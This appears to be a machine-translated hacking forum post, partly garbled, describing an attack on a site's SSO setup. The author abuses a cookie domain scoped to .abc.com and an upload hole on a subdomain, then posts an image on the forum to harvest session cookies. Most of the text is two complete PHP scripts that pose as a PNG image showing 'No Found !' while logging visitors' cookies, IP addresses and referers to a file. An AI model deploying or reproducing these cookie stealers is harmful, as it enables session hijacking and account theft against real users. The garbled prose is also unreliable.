sso役割ドメインはクッキーを盗んで局phpにまたがってpngプログラムコードを生成する

最近、ある大手サイトに浸透し、登録した後、sso技術であることがわかり、登録後、フォーラムなど、どの支局にも登録することができます.戦略が厳格ではないため、別の考え方の駅をまたぐ抜け穴がある.そのssoがクッキーに戻る役割ドメインは.abc.comは、以下のクッキーだけでアクセスできます.分析は以下の通り

Set-Cookie: abcsession=2C521723E6C202D8648F14E9D93C319D; expires=Tue, 08-Nov-41 03:03:12 GMT; path=/; domain=.abc.com

abc.com下某分局hb.abc.comにはアップロードの抜け穴(linxu権限機械が死んで、大馬馬馬の馬の機能をアップロードするなど制限されている)があり、gdズボンがまだあるので、phpをアップロードしてクッキーを捕まえた.
phpはpngとして返され、クッキーをローカルフォルダに保持します.
そこで思い切ってその駅に立った.abc.comフォーラムは画像を発表して、住所は本プログラムの経路です.后ろのは淫らに言わない!
注意:ユーザーが駅をまたいでクッキーを受け取るプログラムではありません!

<?php
date_default_timezone_set("PRC");
header("content-type:image/png"); 
$img=ImageCreate(100,35); 
$bgcolor=ImageColorAllocate($img,0,0,0); 
$red=ImageColorAllocate($img,255,0,0); 
$bgcolortrans=ImageColorTransparent($img,$bgcolor); 
ImageString($img,5,10,10,"No Found !",$red); 
ImagePng($img); 
ImageDestroy($img); 

$cookie="---------".date("Y m d G i s ")."---------
";

foreach ($GLOBALS[_COOKIE] as $key=>$v)
{
	$cookie= $cookie.$key.'='.$v.";";
}

$cookie=$cookie."
  IP   ： ".$GLOBALS[REMOTE_ADDR]."
";
$cookie=$cookie."     ： ".$_SERVER[HTTP_REFERER]."
";
$cookie=$cookie."----------------------------------------

";
$fp=fopen('cook.txt','at');
fwrite($fp,$cookie);
fclose($fp);
?>

純粋なクロスステーションクッキーコード:

<?php
date_default_timezone_set("PRC");
header("content-type:image/png"); 
$img=ImageCreate(100,35); 
$bgcolor=ImageColorAllocate($img,0,0,0); 
$red=ImageColorAllocate($img,255,0,0); 
$bgcolortrans=ImageColorTransparent($img,$bgcolor); 
ImageString($img,5,10,10,"No Found !",$red); 
ImagePng($img); 
ImageDestroy($img); 

$cookie="---------".date("Y m d G i s ")."---------
";
$cookie.="Cookie ：".$_SERVER[QUERY_STRING];
$cookie.="
  IP   ： ".$GLOBALS[REMOTE_ADDR]."
";
$cookie.="     ： ".$_SERVER[HTTP_REFERER]."
";
$cookie.="     ： ".$_SERVER[HTTP_USER_AGENT]."
";
$cookie.="----------------------------------------

";
$fp=fopen('cookie.txt','at');
fwrite($fp,$cookie);
fclose($fp);

?>